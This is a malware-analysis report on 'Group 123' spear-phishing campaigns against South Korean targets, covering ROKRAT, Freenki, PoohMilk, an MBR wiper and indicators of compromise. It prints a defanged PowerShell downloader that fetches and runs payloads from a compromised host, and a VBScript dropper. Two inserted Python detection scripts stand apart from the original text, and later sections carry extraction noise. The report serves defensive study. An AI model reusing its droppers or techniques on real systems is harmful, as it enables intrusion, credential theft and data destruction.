# Korea In The Crosshairs

This blog post is authored by Warren Mercer and Paul Rascagneres and with contributions from Jungsoo An.

A one year review of campaigns performed by an actor with multiple campaigns mainly linked to South Korean targets.

### Executive Summary

This article exposes the malicious activities of Group 123 during 2017.
We assess with high confidence that Group 123 was responsible for the following six campaigns:

- "Golden Time" campaign.
- "Evil New Year" campaign.
- "Are you Happy?" campaign.
- "FreeMilk" campaign.
- "North Korean Human Rights" campaign.
- "Evil New Year 2018" campaign.

On January 2nd of 2018, the "Evil New Year 2018" campaign was started. This campaign copies the approach of the 2017 "Evil New Year" campaign.

The links between the different campaigns include shared code and compiler artifacts such as PDB (Program DataBase) patterns which were present throughout these campaigns.

Based on our analysis, the "Golden Time", both "Evil New Year" and the "North Korean Human Rights" campaigns specifically targeted South Korean users. The attackers used spear phishing emails combined with malicious HWP documents created using the Hancom Hangul Office Suite. Group 123 has been known to use exploits (such as CVE-2013-0808) or scripting languages harnessing OLE objects. The purpose of the malicious documents was to install and execute ROKRAT, a remote administration tool (RAT). On occasion the attackers directly included the ROKRAT payload in the malicious document, and during other campaigns the attackers leveraged multi-stage infection processes: the document only contained a downloader designed to download ROKRAT from a compromised web server.

Additionally, the "FreeMilk" campaign targeted several non-Korean financial institutions. In this campaign, the attackers made use of a malicious Microsoft Office document, a deviation from their normal use of Hancom documents. This document exploited a newer vulnerability, CVE-2017-0199. Group 123 used this vulnerability less than one month after its public disclosure. During this campaign, the attackers used 2 different malicious binaries: PoohMilk and Freenki. PoohMilk exists only to launch Freenki.
Freenki is used to gather information about the infected system and to download a subsequent stage payload. This malware was used in several campaigns in 2016 and has some code overlap with ROKRAT.

Finally, we identified a 6th campaign that is also linked to Group 123. We named this 6th campaign "Are You Happy?". In this campaign, the attackers deployed a disk wiper. The purpose of this attack was not only to gain access to the remote infected systems but also to wipe the first sectors of the device. We identified that the wiper is a ROKRAT module.

This actor was very active this year and continued to mainly focus on South Korea. The group leveraged spear phishing campaigns and malicious documents, the contents of which included very specific language suggesting that they were crafted by native Korean speakers rather than through the use of translation services. The actor has the following demonstrated capabilities:

- To include exploits (for Hangul and Microsoft Office) in its workflows.
- To modify its campaigns by splitting the payload into multiple stages.
- To use compromised web servers or legitimate cloud based platforms.
- To use HTTPS communications to make it harder to perform traffic analysis.
- To compromise third parties to forge realistic spear phishing campaigns (i.e. Yonsei).

### The Timeline

Here is the timeline for 2017 and the beginning of 2018:

### August 2016 to March 2017: "Golden Time" Campaign

As with the majority of Group 123 campaigns, the initial attack vector during this campaign was spear phishing. Talos identified two different kinds of emails. The first email we discovered was the most interesting. In this sample, we observed the attackers praising the user for joining a panel related to the "Korean Reunification and North Korean Conference".
The text in the email explained that the recipient should complete the attached document to provide necessary feedback. This appears to be a non-existent conference. The closest match we identified related to any Unification conference was held in January 2017, which was the NYDA Reunification conference. The sender was 'kgf2016@yonsei.ac.kr', which is the contact email of the Korea Global Forum, a separate conference.

When we analyzed the email headers, we determined that the email was sent from an SMTP server using an IP associated with the Yonsei University network. We believe that the email address was compromised and abused by the attackers to send the email used in this campaign.

The filename for the malicious attachment translates as 'Unification North Korea Conference _ Examination Documents', which reinforces the text in the email about the reunification conference. For an added bonus, in the body of the email, the attacker even suggests that people who completed the document would get paid a 'small fee'. Perhaps the gift of embedded malware is the payment:

Much less effort was used to craft the second email Talos analyzed. The email was from a free Korean mail service provided by Daum, Hanmail, indicating that there was no attempt to appear as if it originated from an official body or person, unlike the previous email described. The subject was simply 'Request Help' while the attachment filename was 'I'm a munchon person in Gangwon-do, North Korea'.
We suspect the attacker was trying to generate sympathy by reminding the reader that Munchon and the province it is in, Kangwon, were part of a unified province that included South Korea's Gangwon-do prior to the division of Korea in 1945.

A second email contained a story about a person called 'Ewing Kim' who was looking for help:

The email's attachments are two different HWP documents, both leveraging the same vulnerability (CVE-2013-0808). This vulnerability targets the EPS (Encapsulated PostScript) format. The purpose of the shellcode is to download a payload from the Internet. The first email displays the following decoy document to the infected user and downloads the following payload:

- hxxp://discgolfglow[.]com/wp-content/plugins/maintenance/images/worker.jpg

The second email displays the following decoy document to the infected user and downloads:

- hxxp://acddesigns[.]com[.]au/clients/ACPRCM/kingstone.jpg

In both cases, the downloaded payload is the ROKRAT malware.

The first task of this variant of ROKRAT is to check the operating system version. If Windows XP is detected, the malware executes an infinite loop. The purpose is to generate empty reports if opened on sandbox systems running Windows XP. Additionally, it checks to determine if common analysis tools are currently running on the infected system. If it detects the presence of these tools, the malware performs two network requests to legitimate websites:

- hxxps://www[.]amazon[.]com/Men-War-PC/dp/B001QZGVEC/EsoftTeam/watchcom.jpg
- hxxp://www[.]hulu[.]com/watch/559035/episode3.mp4

The Amazon URL displays a WWII game called 'Men of War' while the Hulu URL attempts to stream a Japanese anime show called 'Golden Time':

One of the identifying characteristics of ROKRAT is the fact that it uses social network and cloud platforms to communicate with the attackers.
These platforms are used to exfiltrate documents and receive instructions. Here is a list of the platforms used by this variant: Twitter, Yandex and Mediafire. The tokens for each platform are hardcoded within the sample:

### "Evil New Year" Campaign

In the early part of 2017, Group 123 started the "Evil New Year" campaign. In this campaign the actors tried to fool victims by pretending the emails were from the Korean Ministry of Unification and that they offered Korean-specific analysis. This campaign began with a handful of spear phishing emails to South Korean targets containing malicious attachments. Group 123 further attempted to entice victims to open the attachments by using common Hancom Hangul documents. Hancom's Hangul is a popular Office Suite used primarily in the Korean peninsula. The use of Hangul office documents has the advantage of being the norm for the Korean peninsula. If the attacker had used Microsoft documents, it may have raised suspicions in the victim. Given the regional file format used, there is a chance that some security software suites may not handle them well, and this may have provided an evasion case for the attacker.

The documents sent to the targets were titled "Analysis of 'Northern New Year in 2017'" and used the official logo of the Korean Ministry of Unification. This is a simple choice for the actor to make, but it further shows their familiarity with the region.

The document claimed to discuss the New Year's activities of North Korea and this would have been something that the victims in South Korea would be very interested in. This would have

This document was a decoy aimed to entice the user to open malicious documents embedded further down the page.

The actor embedded two additional links and the document urged the user to click on these links for more information about New Year's activities in North Korea.
The first link was labeled as "Comparison of Major Tasks in '16 & '17" and the second link was identified as "Comparison between '16 & '17".

Upon opening these links the user was presented with a further decoy Hangul document. This document was well written and further increases our confidence that we are dealing with a new Korean actor. These documents contained malicious OLE objects used to drop binaries.

This time, however, they contained malicious OLE (Object Link Embedded) objects. Initial analysis confirmed two similarly sized OLE object files within this document which appeared to be the same from an execution point of view.

The two dropped binaries were stored and executed in this location during our analysis:

- `C:\Users\ADMINI~1\AppData\Local\Temp\Hwp (2).exe`
- `C:\Users\ADMINI~1\AppData\Local\Temp\Hwp (3).exe`

Initial analysis showed some sloppy cleaning up from Group 123, which we used later to determine that separate campaigns were the work of this same actor, as compilation artifacts remained within the binaries:

`e:\Happy\Work\Source\version 12\T+M\Result\DocPrint.pdb`

The second stage of the dropped binaries was used to execute wscript.exe while injecting shellcode into this process. The shellcode is embedded within the resource 'BIN' and is used to unpack another PE32 binary and use wscript.exe to execute it. To do this, Group 123 uses a

The new PE32 unpacked from the shellcode is an initial reconnaissance malware which is used to communicate with the C2 infrastructure to obtain the final payload.
The information this malware collected included the following:

- The computer name
- The username
- The execution path of the sample
- The BIOS model
- A randomly-generated ID to uniquely identify the system

Group 123 utilized this method to ensure their victim was (a) someone they wanted to target further and (b) someone they could infect further based on the information obtained from the reconnaissance phase.

Further network analysis showed that the binary attempted to connect to the following URLs:

- www[.]kgls[.]or[.]kr/news2/news_dir/index.php
- www[.]kgls[.]or[.]kr/news2/news_dir/02BC6B26_put.jpg

Korean Government Legal Services (KGLS) is a legitimate Korean government body that manages Korean government legal affairs. By compromising the KGLS, the attacker gained a trusted platform from which to execute an attack.

The initial network connection is to 'index.php'. This connection transmits the information gathered during the reconnaissance phase. The attacker uses this information to then determine the specific filename (based on the random ID) to serve to the infected victim. In our case this was 02BC6B26, which meant a file "02BC6B26_put.jpg" was created for us on the attacker's C2. This file is then dropped and renamed 'officepatch.exe' on the victim's machine. Because the attacker was careful about who they attacked, we were unable to obtain this file during our analysis.

During our investigation we were able to identify additional Command and Control infrastructure used by this actor. Four C2s were observed, based in the following countries:

- 3 C2 in South Korea
- 1 C2 in the Netherlands

Here is a global map of the identified infrastructure:

Contrary to the previous campaign, the attackers separated the reconnaissance phase from the main ROKRAT payload. This trick was likely used to avoid detection.
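
Across these campaigns the next stage is fetched under an image name: worker.jpg and kingstone.jpg in "Golden Time", the `<ID>_put.jpg` second stage here, and the "PNGF" pseudo-image of the FreeMilk third stage described later. The following Python check is an added example, not code from Talos or this write-up: it flags image-named downloads whose bytes are not an image. The `example[.]invalid` URLs and the file contents are constructed samples; only the `_put.jpg` naming pattern and the "PNGF" prefix come from the article.

```python
"""Flag downloads that are named like images but do not carry image content."""
import re
from typing import List, Optional

# Magic bytes of the image formats we expect behind these extensions.
JPEG_MAGIC = b"\xff\xd8\xff"
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
GIF_MAGICS = (b"GIF87a", b"GIF89a")
IMAGE_EXTENSIONS = (".jpg", ".jpeg", ".png", ".gif")

# Second-stage naming seen in "Evil New Year": eight hex digits of the victim ID, then "_put.jpg".
PUT_JPG_RE = re.compile(r"^[0-9A-Fa-f]{8}_put\.jpg$")


def sniff_image(data: bytes) -> Optional[str]:
    """Identify the real image format from its magic bytes, or None if there is none."""
    if data.startswith(JPEG_MAGIC):
        return "jpeg"
    if data.startswith(PNG_MAGIC):
        return "png"
    if data.startswith(GIF_MAGICS):
        return "gif"
    return None


def filename_from_url(url: str) -> str:
    """Last path component of a URL, without query string or fragment."""
    return url.split("?", 1)[0].split("#", 1)[0].rsplit("/", 1)[-1]


def assess_download(url: str, data: bytes) -> List[str]:
    """Findings for one image-named download; an empty list means nothing suspicious."""
    name = filename_from_url(url)
    findings: List[str] = []
    if not name.lower().endswith(IMAGE_EXTENSIONS):
        return findings  # only image-named files are in scope for this check
    if PUT_JPG_RE.match(name):
        findings.append("victim-ID '_put.jpg' naming pattern")
    if sniff_image(data) is not None:
        return findings  # genuine image bytes behind the image name
    if data.startswith(b"PNGF"):
        findings.append("fake 'PNGF' header, not a real PNG")
    elif data[:2] == b"MZ":
        findings.append("PE executable served under an image name")
    else:
        findings.append("no image magic: likely shellcode or encoded payload")
    return findings


# Constructed samples on a reserved example host; none are the real campaign files.
SAMPLES = {
    # A real PNG header followed by the start of an IHDR chunk.
    "hxxp://example[.]invalid/img/logo1.png": PNG_MAGIC + b"\x00\x00\x00\rIHDR" + b"\x00" * 16,
    # Not an image at all: the 5-byte NOP the write-up mentions, padded.
    "hxxp://example[.]invalid/img/worker.jpg": b"\x0f\x1f\x44\x00\x00" + b"\x00" * 32,
    # DOS header start under the victim-ID naming pattern.
    "hxxp://example[.]invalid/news_dir/02BC6B26_put.jpg": b"MZ\x90\x00\x03\x00\x00\x00" + b"\x00" * 56,
    # Freenki-style third stage with the bogus "PNGF" prefix.
    "hxxp://example[.]invalid/stage3.jpg": b"PNGF" + b"\x7f\x3a\x11" * 20,
    # Out of scope: not an image name.
    "hxxp://example[.]invalid/page.php?id=1": b"<html>",
}

if __name__ == "__main__":
    for url, body in SAMPLES.items():
        print(filename_from_url(url), "->", assess_download(url, body) or ["ok"])
```

Run against proxy or sandbox download records, the findings list is what you would turn into an alert; a real image yields an empty list.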
This is an interesting adaptation in Group 123's behavior.

### March 2017: "Are You Happy?" Campaign

In March 2017, Group 123 compiled a disk wiper. The malware contains one function, whose purpose is to open the drive of the infected system (`\\.\PhysicalDrive0`) and write the following data to the MBR:

The malware then reboots the machine with the following command: `c:\windows\system32\shutdown /r /t 1`

After the reboot, the MBR displays the following string to the user:

The link to the other campaigns was the following PDB path:

`D:\HighSchool\version 13\VC2008(Version15)\T+M\T+M\TMProject\Release\ErasePartition.pdb`

As you can see, it perfectly matches the ROKRAT PDB. This wiper is a ROKRAT module named ERSP.enc. We assume that ERSP means ERaSePartition. This module can be downloaded and executed on demand by Group 123.

This sample is interesting considering the attack in December 2014 against a Korean power plant where the message that was displayed by the wiper was "Who Am I?".

### May 2017: "FreeMilk" Campaign

This campaign targeted non-Korean financial institutions, but unlike the other campaigns, this one does not use HWP documents. It instead uses Office documents. This change is because Group 123 did not target South Korea during this campaign and Microsoft Office is standard in the rest of the world.

### Infection Vectors

The attackers exploited CVE-2017-0199 in order to download and execute a malicious HTA document inside of Microsoft Office.
The URL used can be found in the embedded OLE object:

Here is the source code of the downloaded HTA document:

Once decoded using the base64 algorithm, we are able to read the final payload:

```powershell
$c=new-object System.Net.WebClient
$t =$env:temp
$t1=$t+"\\alitmp0131.jpg"
$t2=$t+"\\alitmp0132.jpg"
$t3=$t+"\\alitmp0133.js"
try
{
echo $c.DownloadFile( "hxxp://old[.]jrchina[.]com/btob_asiana/appach01.jpg",$t1)
$c.DownloadFile( "hxxp://old[.]jrchina[.]com/btob_asiana/appach02.jpg",$t2)
$c.DownloadFile( "hxxp://old[.]jrchina[.]com/btob_asiana/udel_ok.ipp",$t3)
wscript.exe $t3
}
catch
```

The purpose of this script is to download and execute a Windows script and two encoded payloads. The script is used to decode and execute the following payloads:

- Appach01.jpg (renamed: Windows-KB275122-x86.exe) is a Freenki sample.
- Appach02.jpg (renamed: Windows-KB271854-x86.exe) is a PoohMilk sample.

### PoohMilk Analysis

The PoohMilk sample is designed to perform two actions:

- Create persistence to execute the Freenki sample at the next reboot.
- Check specific files on the infected machine.

The first action is to create a registry key in order to execute the Windows-KB275122-x86.exe file previously downloaded. The file is executed with the argument "help". Here is the registry creation:

The registry location where persistence is achieved is `HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update`. At the next reboot, the malware will be executed.

The second action is to check if the file "wsatra.tmp" exists in the temporary directory of the current user. If this file exists, the content is read in order to obtain a path to find a second file with the LNK (link) extension. The LNK file is finally used to identify a third file: a ZIP file. The
The�** **file will be inflated in order to retrieve a RTF document, this document will be displayed to the�** **infected user by executing Wordpad.** **Here is the PDB path from the PoohMilk sample:** **E:\BIG_POOH\Project\milk\Release\milk.pdb** ### Freenki Sample **The purpose of Freenki is to collect information on the infected system and to download a third** **executable.** **This sample can be executed with 3 different arguments:** **"Help": the value configured by PoohMilk. In this context the main function is�** **executed.** **"Console": with the argument, a persistence is configured and the malware will be�** **executed at the next reboot (** **HKCU\Software\Microsoft\Windows\CurrentVersion\Run\runsample ).** **"Sample": with this argument, the malware executes the console command** **followed by the help command.** **The information collected is performed using WMI queries:** ----- **Additionally the malware lists the running process via the Microsoft Windows API. The malware** **uses obfuscation in order to hide strings such as URL or User-Agent, the algorithm is based on** **bitwise (SUB 0x0F XOR 0x21), here is the decoded data:** **hxxp://old[.]jrchina[.]com/btob_asiana/udel_confirm.php�** **Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR** **2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0;** **.NET4.0C; Tablet PC 2.0; .NET4.0E; InfoPath.3)** **The downloaded third payload is obfuscated using the same technique. The file is a fake image�** **starting with "PNGF".** ### N O V E M B E R 2 0 1 7 : " C A M P A I G N **In November 2017, Talos observed the latest Group123 campaign of the year, which included a** **new version of ROKRAT being used in the latest wave of attacks. Group 123 again used one** **of their main calling cards, the malicious HWP document. This time, Group 123 used a** **document containing information in relation to a meeting held on 1st November in Seoul, South** **Korea. 
This document was alleged to have been written by a legal representative claiming to be representing the "Citizens' Alliance For North Korean Human Rights And Reunification Of Korean Peninsula". Group 123 once again uses information related to Korean unification and is now claiming to highlight concerns related to human rights issues.

The document brought Talos a new gift: a new version of ROKRAT. In keeping with normal Group 123 activity, the document was written in perfect Korean text and dialect, again suggesting the origin of this group is the Korean peninsula.

Further analysis of the document text allowed us to understand the context. The document mentions 'Community of North Korean human rights and unification' with the lawyer claiming to be part of the "Citizen's Alliance for North Korean Human Rights and North-South unification". The main purpose of this document was an attempt to arrange a meeting to discuss items related to the "North Korean Human Rights Act" and "Enactment of a Law" which was passed in 2016 in South Korea. We believe that the document was attempting to target stakeholders within the '올인통' community in an attempt to entice them to join the discussion and work on additional ideas related to these activities. The meeting was due to take place on November 1, 2017 and this document was trying to garner additional interest prior to the meeting.

Once again Group 123 leveraged the use of OLE objects within the HWP document.
Analysis starts with a zlib decompression (a standard action for HWP documents) and we are able to recover the following script:

```vbscript
const strEncode = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" ' remainder of the base64 string is cut off in the write-up

DIM shell_obj
SET shell_obj = CreateObject("WScript.Shell")
DIM fso
SET fso = CreateObject("Scripting.FileSystemObject")
outFile = "c:\ProgramData\HncModuleUpdate.exe"
base64Decoded = decodeBase64(strEncode)
IF NOT(fso.FileExists(outFile)) then
    writeBytes outFile, base64Decoded
    shell_obj.run outFile
END IF
WScript.Quit()

private function decodeBase64(base64)
    DIM DM, EL
    SET DM = CreateObject("Microsoft.XMLDOM")
    SET EL = DM.createElement("tmp")
    EL.DataType = "bin.base64"
    EL.Text = base64
    decodeBase64 = EL.NodeTypedValue
end function

private Sub writeBytes(file, bytes)
    DIM binaryStream
    SET binaryStream = CreateObject("ADODB.Stream")
    binaryStream.Type = 1
    binaryStream.Open
    binaryStream.Write bytes
    binaryStream.SaveToFile file, 1
End Sub
```

This script is executed and is used to decode a static base64 string within the strEncode variable. Using base64 decoding, the decoded binary is stored as HncModuleUpdate.exe and is then executed. This is the ROKRAT dropper. Talos suspects the filename may have been selected to make it appear within running processes as a potential Hancom updater.

The dropper is used to extract a new resource named SBS. This specific resource contains malicious shellcode used by the malware. Additionally we see a cmd.exe process launched and used for process injection using the VirtualAlloc(), WriteProcessMemory() and CreateRemoteThread() Windows APIs; as with the first finding of ROKRAT, they continue to use similar Windows APIs.
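
Both the HTA downloader in the FreeMilk section and this VBScript dropper carry their next stage as one long base64 literal: PowerShell text in the first case, an MZ executable (the `TVqQAAMAAAAEAAAA` prefix is a base64-encoded DOS header) in the second. The Python below is an added example, not code from the write-up, that pulls such literals out of a script, even when split with `& _` continuations, and classifies what they decode to. `FAKE_PE`, both sample scripts and the `-EncodedCommand` framing are constructed for the demonstration; only the defanged URL and file names are taken from the article.

```python
"""Pull base64 literals out of HTA/VBScript droppers and classify what they decode to."""
import base64
import binascii
import re
import struct

# A base64 run long enough to carry a payload rather than a short token.
B64_RUN_RE = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")
# String concatenation between literal pieces, e.g. VBScript  "..." & _ <newline> "..."
CONCAT_RE = re.compile(r'"\s*[&+]\s*_?\s*"')
# Tokens typical of the PowerShell downloader stage.
PS_MARKERS = re.compile(r"new-object|downloadfile|\$env:|invoke-expression|\biex\b", re.I)


def is_pe(blob: bytes) -> bool:
    """MZ header plus a 'PE\\0\\0' signature at the e_lfanew offset (0x3C)."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", blob, 0x3C)
    return blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def decode_text(blob: bytes):
    """Return the blob as printable text (UTF-16LE or UTF-8), or None if it is not text."""
    # -EncodedCommand payloads are UTF-16LE: every odd byte of ASCII text is NUL.
    utf16 = len(blob) >= 2 and len(blob) % 2 == 0 and blob[1::2].count(0) >= len(blob) // 4
    try:
        text = blob.decode("utf-16-le" if utf16 else "utf-8")
    except UnicodeDecodeError:
        return None
    return text if all(ch.isprintable() or ch in "\r\n\t" for ch in text) else None


def classify(blob: bytes) -> str:
    """'pe' for an executable, 'powershell'/'text' for script text, else 'binary'."""
    if is_pe(blob):
        return "pe"
    text = decode_text(blob)
    if text is None:
        return "binary"
    return "powershell" if PS_MARKERS.search(text) else "text"


def extract_payloads(script: str) -> list:
    """Return [(kind, decoded_bytes), ...] for every long base64 literal in a script."""
    joined = CONCAT_RE.sub("", script)  # glue split string literals back together
    results = []
    for match in B64_RUN_RE.finditer(joined):
        try:
            blob = base64.b64decode(match.group(0), validate=True)
        except binascii.Error:
            continue  # not a complete base64 literal
        results.append((classify(blob), blob))
    return results


# --- Constructed samples; none of this is the real campaign material ---------
# Minimal PE-shaped blob: MZ header, e_lfanew = 0x40, then the PE signature.
FAKE_PE = b"MZ" + b"\x00" * 0x3A + struct.pack("<I", 0x40) + b"PE\x00\x00" + b"\x00" * 60
_B64_PE = base64.b64encode(FAKE_PE).decode()
SAMPLE_VBS = (
    'const strEncode = "' + _B64_PE[:80] + '" & _\n'
    '    "' + _B64_PE[80:] + '"\n'
    'outFile = "c:\\ProgramData\\HncModuleUpdate.exe"\n'
    "writeBytes outFile, decodeBase64(strEncode)\n"
)
# PowerShell stage (defanged URL as in the write-up), base64 of UTF-16LE like -EncodedCommand.
PS_TEXT = (
    "$c=new-object System.Net.WebClient\r\n"
    "$t=$env:temp\r\n"
    '$c.DownloadFile("hxxp://old[.]jrchina[.]com/btob_asiana/appach01.jpg",$t+"\\alitmp0131.jpg")\r\n'
)
SAMPLE_HTA = (
    '<script language="VBScript">\n'
    'Set sh = CreateObject("WScript.Shell")\n'
    'sh.Run "powershell -EncodedCommand '
    + base64.b64encode(PS_TEXT.encode("utf-16-le")).decode() + '", 0\n'
    "</script>\n"
)

if __name__ == "__main__":
    for name, script in (("HWP VBScript", SAMPLE_VBS), ("HTA", SAMPLE_HTA)):
        for kind, blob in extract_payloads(script):
            print(f"{name}: {kind} payload, {len(blob)} bytes")
```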
The following graph view from IDA shows these steps.

These execution steps allow the launch of the new ROKRAT variant by decoding the PE binary and injecting into the cmd.exe process.

One of Group 123's oddities in this campaign was to drop the following picture as a decoy image to the user. This image shows various publicly available images which look to be related to the Korean 'Independence Movement' and appear to be related to the Korean war.

We began performing further in-depth analysis on this new version of ROKRAT and this is where we started to notice some similarities with Group 123's "Evil New Year" campaign. The similarities are discussed later in this paper.

This ROKRAT variant contained anti-sandbox techniques. This is performed by checking if the following libraries are loaded on the victim machine:

- SbieDll.dll (Sandboxie library)
- Dbghelp.dll (Microsoft debugging tools)
- Api_log.dll (ThreatAnalyzer / GFI SandBox)
- Dir_watch.dll (ThreatAnalyzer / GFI SandBox)

To make analysis difficult, Group 123 used an anti-debugging technique related to NOP (No Operation). `nop dword ptr [eax+eax+00h]` is a 5 byte NOP. This opcode is not correctly supported by some debugging tools; Immunity Debugger, for example, will replace the assembly by "???" in red, making it difficult to attempt to debug.

This version of ROKRAT came with a Browser Stealer mechanism which was similar, with a few modifications, to that used in the FreeMilk campaign using Freenki malware in 2016.

Group 123 continued their use of Cloud platforms with this campaign, this time leveraging pCloud, Dropbox, Box and Yandex.

Finally here is the PDB of the sample used during this campaign:

`d:\HighSchool\version 13\2ndBD\T+M\T+M\Result\DocPrint.pdb`

### January 2018: "Evil New Year 2018" Campaign

As we observed at the beginning of 2017, Group 123 started a campaign corresponding with the new year in 2018.
This campaign started on the 2nd of January. The infection vector was a malicious HWP document.

This decoy document is an analysis of the 2018 New Year speech made by the leader of North Korea. The approach is exactly the same as what was seen in 2017, using a new decoy document. This document was alleged to have been written by the Ministry of Reunification as demonstrated by the logo in the top left.

Similar to the "Golden Time" campaign, this document exploits an EPS vulnerability in order to download and execute shellcode located on a compromised website:

- hxxp://60chicken[.]co[.]kr/wysiwyg/PEG_temp/logo1.png

The fake image usage is a common pattern for this group. This image contains shellcode used to decode the embedded final payload: ROKRAT. This ROKRAT variant is loaded from memory. It is a fileless version of ROKRAT. This behavior shows that Group 123 is constantly evolving to avoid detection. As usual, the ROKRAT sample uses cloud providers to communicate with the operator, this time leveraging Yandex, pCloud, Dropbox and Box.

### Links Between Campaigns

### Code Sharing

are shared in the samples mentioned in this article; however, we will cover only two in this article: the reconnaissance phase and the browser stealer.

**Reconnaissance Phase**

The ROKRAT samples used during the two "Evil New Year" and the "North Korean Human Rights" campaigns contained a reconnaissance phase. In the "Evil New Year" campaign the payload was split into two parts, the first part containing the reconnaissance code. In the other campaign the reconnaissance phase was directly included in the main payload. This code is the same.

The malware uses the following registry key to get the machine type: `HKLM\System\CurrentControlSet\Services\mssmbios\Data\SMBiosData`. The "System manufacturer" value is used to identify the type of machine.
The code appears to be based on a forum post (rohitab.com) describing the use of the Win32 APIs involved. The source code only considers the following machine types:

```c
default:   lpString = "(Other)"; break;
case 0x02: lpString = "(Unknown)"; break;
case 0x03: lpString = "(Desktop)"; break;
case 0x04: lpString = "(Low Profile Desktop)"; break;
case 0x06: lpString = "(Mini Tower)"; break;
case 0x07: lpString = "(Tower)"; break;
case 0x08: lpString = "(Portable)"; break;
case 0x09: lpString = "(Laptop)"; break;
case 0x0A: lpString = "(Notebook)"; break;
case 0x0E: lpString = "(Sub Notebook)"; break;
```

The string format (with the parentheses) and the considered types are exactly the same as those used in the ROKRAT samples.

It is interesting to note that this reconnaissance phase was not included in the ROKRAT variant used during the "Golden Time" campaign.

**Browser Stealer**

For the first time, the ROKRAT sample used during the "North Korean Human Rights" campaign contained a browser credentials stealer. The code used to perform this task is the same as that found within a Freenki sample deployed in 2016.

The malware is able to extract the stored passwords from Internet Explorer, Chrome and Firefox. For Chrome and Firefox the malware queries the sqlite database containing the URL

Additionally, they support the Microsoft Vault mechanism. Vault was implemented in Windows 7; it contains sensitive data (like the credentials) of Internet Explorer. Here is the initialization of the Vault APIs:

On the left, we have the ROKRAT sample and on the right the FreeMilk sample.
You can see that in addition to the code, the author copy-pasted English typos such as "IE Registery":

### PDB Paths

We can clearly identify a pattern in the PDB naming convention of all the binaries mentioned in this article.

ROKRAT:

- `e:\Happy\Work\Source\version 12\T+M\Result\DocPrint.pdb` (from the "Evil New Year" campaign)
- `d:\HighSchool\version 13\2ndBD\T+M\T+M\Result\DocPrint.pdb` (from the "North Korean Human Rights" campaign)
- `D:\HighSchool\version 13\First-Dragon(VS2015)\Sample\Release\DogCall.pdb` (ROKRAT sample from an unidentified campaign from June)

Wiper:

- `D:\HighSchool\version 13\VC2008(Version15)\T+M\T+M\TMProject\Release\ErasePartition.pdb` (from the "Are You Happy?" campaign)

### Summary Graph

Here is a graph to visualize the similarities and differences between each campaign mentioned in this article:

### Conclusion

South Korea is becoming an important target for malicious actors and the techniques used are becoming specific to the region (for example: use of native language to try and ensure the targets feel that the information, document or email being sent to them has added legitimacy).

In a specific campaign, this actor took time to compromise multiple legitimate Korean platforms including Yonsei and the KGLS in order to forge the spear phishing campaign or to host the command and control. This approach is not common with less advanced actors and demonstrates a high level of maturity and knowledge of the Korean region.

However, Group 123's activities are not limited to South Korea. For international targets, they are able to switch to a more standard attack vector such as using Microsoft Office documents as opposed to the specific HWP documents used when targeting victims located in Korea. Group 123 does not hesitate to use public exploits and scripting languages to drop and execute malicious payloads.
We can notice that this group uses compromised legitimate** **websites (mainly Wordpress) and cloud platforms to communicate with the infected systems.** **This approach makes it difficult to detect communications through analysis of these network�** **flows. Even if the arsenal of this actor is diverse, we have identified some patterns, copy-paste�** **code from various public repositories and similarities between the different piece of code. In** **addition to the Remote Administration Tools, we identified a wiper. We conclude that this group�** **was involved in a campaign of intelligence gathering and finally attempted destruction.�** **With our current knowledge of this actor, we predict that they will not disappear anytime soon** **and will continue to be active during the coming years. Group 123 is constantly evolving as the** ----- **explained their capabilities will likely continue to evolve over time as they further refine their�** **TTPs.** ### I O C S "Golden Time" Campaign: **Maldoc #1 sha256:** **7d163e36f47ec56c9fe08d758a0770f1778fa30af68f39aac80441a3f037761e** **Maldoc #2 sha256:** **5441f45df22af63498c63a49aae82065086964f9067cfa75987951831017bd4f** **ROKRAT #1: cd166565ce09ef410c5bba40bad0b49441af6cfb48772e7e4a9de3d646b4851c** **ROKRAT #1: 051463a14767c6477b6dacd639f30a8a5b9e126ff31532b58fc29c8364604d00** **Network:** **Malicious URLs:** **- hxxp://discgolfglow[.]com/wp-content/plugins/maintenance/images/worker.jpg** **- hxxp://acddesigns[.]com[.]au/clients/ACPRCM/kingstone.jpg** **Safe URLs:** **- hxxps://www[.]amazon[.]com/Men-War-PC/dp/B001QZGVEC/EsoftTeam/watchcom.jpg** **- hxxp://www[.]hulu[.]com/watch/559035/episode3.mp4** ### "Evil New Year" Campaign: **Maldoc sha256: 281828d6f5bd377f91c6283c34896d0483b08ac2167d34e981fbea871893c919** **Dropped #1: 95192de1f3239d5c0a7075627cf9845c91fd397796383185f61dde893989c08a** **Dropped #2: 7ebc9a1fd93525fc42277efbccecf5a0470a0affbc4cf6c3934933c4c1959eb1** **Dropped #3: 
